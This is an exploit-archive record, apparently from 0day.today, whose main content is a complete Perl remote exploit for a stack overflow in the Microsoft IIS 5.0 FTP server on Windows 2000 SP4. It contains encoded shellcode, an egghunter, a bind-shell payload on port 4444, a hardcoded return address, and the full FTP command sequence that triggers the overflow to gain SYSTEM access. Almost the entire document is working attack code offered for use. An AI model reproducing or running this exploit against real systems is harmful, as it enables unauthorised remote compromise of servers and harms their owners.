Description
Exploit for the Windows platform, in the remote exploits category
{"id": "1337DAY-ID-9516", "type": "zdt", "bulletinFamily": "exploit", "title": "Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit (win2k sp4)", "description": "Exploit for windows platform in category remote exploits", "published": "2009-09-01T00:00:00", "modified": "2009-09-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/9516", "reporter": "muts", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-04-14T17:46:25", "viewCount": 18, "enchantments": {"score": {"value": -0.4, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.4}, "sourceHref": "https://0day.today/exploit/9516", "sourceData": "======================================================================\r\nMicrosoft IIS 5.0 FTP Server Remote Stack Overflow Exploit (win2k sp4)\r\n======================================================================\r\n\r\n\r\n#!/usr/bin/perl\r\n# IIS 5.0 FTP Server / Remote SYSTEM exploit \r\n# Win2k SP4 targets \r\n# bug found & exploited by Kingcope,\r\n# Affects IIS6 with stack cookie protection \r\n# Modded by muts, additional egghunter added for secondary larger payload\r\n# Might take a minute or two for the egg to be found.\r\n# Opens bind shell on port 4444\r\n\r\n# http://www.offensive-security.com/0day/msftp.pl.txt\r\n\r\nuse IO::Socket; \r\n$|=1; \r\n$sc = \"\\x89\\xe2\\xdd\\xc5\\xd9\\x72\\xf4\\x5f\\x57\\x59\\x49\\x49\\x49\\x49\\x43\" .\r\n\"\\x43\\x43\\x43\\x43\\x43\\x51\\x5a\\x56\\x54\\x58\\x33\\x30\\x56\\x58\\x34\" .\r\n\"\\x41\\x50\\x30\\x41\\x33\\x48\\x48\\x30\\x41\\x30\\x30\\x41\\x42\\x41\\x41\" .\r\n\"\\x42\\x54\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42\\x30\\x42\\x42\\x58\" .\r\n\"\\x50\\x38\\x41\\x43\\x4a\\x4a\\x49\\x45\\x36\\x4d\\x51\\x48\\x4a\\x4b\\x4f\" .\r\n\"\\x44\\x4f\\x47\\x32\\x46\\x32\\x42\\x4a\\x43\\x32\\x46\\x38\\x48\\x4d\\x46\" 
.\r\n\"\\x4e\\x47\\x4c\\x45\\x55\\x51\\x4a\\x44\\x34\\x4a\\x4f\\x48\\x38\\x46\\x34\" .\r\n\"\\x50\\x30\\x46\\x50\\x50\\x57\\x4c\\x4b\\x4b\\x4a\\x4e\\x4f\\x44\\x35\\x4a\" .\r\n\"\\x4a\\x4e\\x4f\\x43\\x45\\x4b\\x57\\x4b\\x4f\\x4d\\x37\\x41\\x41\";\r\n# ./msfpayload windows/shell_bind_tcp R | ./msfencode -e x86/shikata_ga_nai -b \"\\x00\\x0a\\x0d\"\r\n\r\n$shell=\"T00WT00W\" .\"\\xda\\xde\\xbd\\x2d\\xe7\\x9b\\x9f\\x2b\\xc9\\xb1\\x56\\xd9\\x74\\x24\\xf4\" .\r\n\"\\x5a\\x83\\xea\\xfc\\x31\\x6a\\x15\\x03\\x6a\\x15\\xcf\\x12\\x67\\x77\\x86\" .\r\n\"\\xdd\\x98\\x88\\xf8\\x54\\x7d\\xb9\\x2a\\x02\\xf5\\xe8\\xfa\\x40\\x5b\\x01\" .\r\n\"\\x71\\x04\\x48\\x92\\xf7\\x81\\x7f\\x13\\xbd\\xf7\\x4e\\xa4\\x70\\x38\\x1c\" .\r\n\"\\x66\\x13\\xc4\\x5f\\xbb\\xf3\\xf5\\xaf\\xce\\xf2\\x32\\xcd\\x21\\xa6\\xeb\" .\r\n\"\\x99\\x90\\x56\\x9f\\xdc\\x28\\x57\\x4f\\x6b\\x10\\x2f\\xea\\xac\\xe5\\x85\" .\r\n\"\\xf5\\xfc\\x56\\x92\\xbe\\xe4\\xdd\\xfc\\x1e\\x14\\x31\\x1f\\x62\\x5f\\x3e\" .\r\n\"\\xeb\\x10\\x5e\\x96\\x22\\xd8\\x50\\xd6\\xe8\\xe7\\x5c\\xdb\\xf1\\x20\\x5a\" .\r\n\"\\x04\\x84\\x5a\\x98\\xb9\\x9e\\x98\\xe2\\x65\\x2b\\x3d\\x44\\xed\\x8b\\xe5\" .\r\n\"\\x74\\x22\\x4d\\x6d\\x7a\\x8f\\x1a\\x29\\x9f\\x0e\\xcf\\x41\\x9b\\x9b\\xee\" .\r\n\"\\x85\\x2d\\xdf\\xd4\\x01\\x75\\xbb\\x75\\x13\\xd3\\x6a\\x8a\\x43\\xbb\\xd3\" .\r\n\"\\x2e\\x0f\\x2e\\x07\\x48\\x52\\x27\\xe4\\x66\\x6d\\xb7\\x62\\xf1\\x1e\\x85\" .\r\n\"\\x2d\\xa9\\x88\\xa5\\xa6\\x77\\x4e\\xc9\\x9c\\xcf\\xc0\\x34\\x1f\\x2f\\xc8\" .\r\n\"\\xf2\\x4b\\x7f\\x62\\xd2\\xf3\\x14\\x72\\xdb\\x21\\xba\\x22\\x73\\x9a\\x7a\" .\r\n\"\\x93\\x33\\x4a\\x12\\xf9\\xbb\\xb5\\x02\\x02\\x16\\xc0\\x05\\xcc\\x42\\x80\" .\r\n\"\\xe1\\x2d\\x75\\x36\\xad\\xb8\\x93\\x52\\x5d\\xed\\x0c\\xcb\\x9f\\xca\\x84\" .\r\n\"\\x6c\\xe0\\x38\\xb9\\x25\\x76\\x74\\xd7\\xf2\\x79\\x85\\xfd\\x50\\xd6\\x2d\" .\r\n\"\\x96\\x22\\x34\\xea\\x87\\x34\\x11\\x5a\\xc1\\x0c\\xf1\\x10\\xbf\\xdf\\x60\" .\r\n\"\\x24\\xea\\x88\\x01\\xb7\\x71\\x49\\x4c\\xa4\\x2d\\x1e\\x19\\x1a\\x24\\xca\" 
.\r\n\"\\xb7\\x05\\x9e\\xe9\\x4a\\xd3\\xd9\\xaa\\x90\\x20\\xe7\\x33\\x55\\x1c\\xc3\" .\r\n\"\\x23\\xa3\\x9d\\x4f\\x10\\x7b\\xc8\\x19\\xce\\x3d\\xa2\\xeb\\xb8\\x97\\x19\" .\r\n\"\\xa2\\x2c\\x6e\\x52\\x75\\x2b\\x6f\\xbf\\x03\\xd3\\xc1\\x16\\x52\\xeb\\xed\" .\r\n\"\\xfe\\x52\\x94\\x10\\x9f\\x9d\\x4f\\x91\\xbf\\x7f\\x5a\\xef\\x57\\x26\\x0f\" .\r\n\"\\x52\\x3a\\xd9\\xe5\\x90\\x43\\x5a\\x0c\\x68\\xb0\\x42\\x65\\x6d\\xfc\\xc4\" .\r\n\"\\x95\\x1f\\x6d\\xa1\\x99\\x8c\\x8e\\xe0\\x90\";\r\n\r\n\r\nprint \"IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\\n\"; \r\nif ($#ARGV ne 1) { \r\nprint \"usage: iiz5.pl <target> <your local ip>\\n\"; \r\nexit(0); \r\n} \r\nsrand(time()); \r\n$port = int(rand(31337-1022)) + 1025; \r\n$locip = $ARGV[1]; \r\n$locip =~ s/\\./,/gi; \r\nif (fork()) { \r\n$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], \r\n PeerPort => '21', \r\n Proto => 'tcp'); \r\n$patch = \"\\x7E\\xF1\\xFA\\x7F\";\r\n$retaddr = \"\\x9B\\xB1\\xF4\\x77\"; # JMP ESP univ on 2 win2k platforms \r\n\r\n$v = \"KSEXY\" . $sc . \"V\" x (500-length($sc)-5); \r\n# top address of stack frame where shellcode resides, is hardcoded inside this block \r\n$findsc=\"\\xB8\\x55\\x55\\x52\\x55\\x35\\x55\\x55\\x55\\x55\\x40\\x81\\x38\\x53\" \r\n .\"\\x45\\x58\\x59\\x75\\xF7\\x40\\x40\\x40\\x40\\xFF\\xFF\\xE0\"; \r\n\r\n# attack buffer \r\n$c = $findsc . \"C\" . ($patch x (76/4)) . $patch.$patch. \r\n ($patch x (52/4)) .$patch.\"EEEE$retaddr\".$patch. \r\n \"HHHHIIII\". 
\r\n$patch.\"JKKK\".\"\\xE9\\x63\\xFE\\xFF\\xFF\\xFF\\xFF\".\"NNNN\"; \r\n$x = <$sock>; \r\nprint $x; \r\nprint $sock \"USER anonimoos\\r\\n\"; \r\n$x = <$sock>; \r\nprint $x; \r\nprint $sock \"PASS $shell\\r\\n\";\r\n$x = <$sock>; \r\nprint $x; \r\nprint $sock \"USER anonimoos\\r\\n\"; \r\n$x = <$sock>; \r\nprint $x; \r\nprint $sock \"PASS $shell\\r\\n\";\r\n$x = <$sock>; \r\nprint $x; \r\n\r\nprint $sock \"USER anonymous\\r\\n\"; \r\n$x = <$sock>; \r\nprint $x; \r\nprint $sock \"PASS anonymous\\r\\n\"; \r\n$x = <$sock>; \r\nprint $x; \r\nprint $sock \"MKD w00t$port\\r\\n\"; \r\n$x = <$sock>; \r\nprint $x; \r\nprint $sock \"SITE $v\\r\\n\"; # We store shellcode in memory of process (stack) \r\n$x = <$sock>; \r\nprint $x; \r\nprint $sock \"SITE $v\\r\\n\"; \r\n$x = <$sock>; \r\nprint $x; \r\nprint $sock \"SITE $v\\r\\n\"; \r\n$x = <$sock>;\r\nprint $x; \r\nprint $sock \"SITE $v\\r\\n\"; \r\n$x = <$sock>; \r\nprint $x; \r\nprint $sock \"SITE $v\\r\\n\"; \r\n$x = <$sock>; \r\nprint $x; \r\nprint $sock \"CWD w00t$port\\r\\n\"; \r\n$x = <$sock>; \r\nprint $x; \r\nprint $sock \"MKD CCC\". \"$c\\r\\n\"; \r\n$x = <$sock>; \r\nprint $x; \r\nprint $sock \"PORT $locip,\" . int($port / 256) . \",\" . int($port % 256) . \"\\r\\n\"; \r\n$x = <$sock>; \r\nprint $x; \r\n# TRIGGER \r\nprint $sock \"NLST $c*/../C*/\\r\\n\"; \r\n$x = <$sock>; \r\nprint $x; \r\nwhile (1) {} \r\n} else { \r\nmy $servsock = IO::Socket::INET->new(LocalAddr => \"0.0.0.0\", LocalPort => $port, Proto => 'tcp', Listen => 1); \r\ndie \"Could not create socket: $!\\n\" unless $servsock; \r\nmy $new_sock = $servsock->accept(); \r\nwhile(<$new_sock>) { \r\nprint $_; \r\n} \r\nclose($servsock); \r\n} \r\n#Cheerio, \r\n# \r\n#Kingcope\r\n\r\n\r\n\r\n\n# 0day.today [2018-04-14] #", "_state": {"dependencies": 1647596110, "score": 1659766679, "epss": 1678811959}}
{}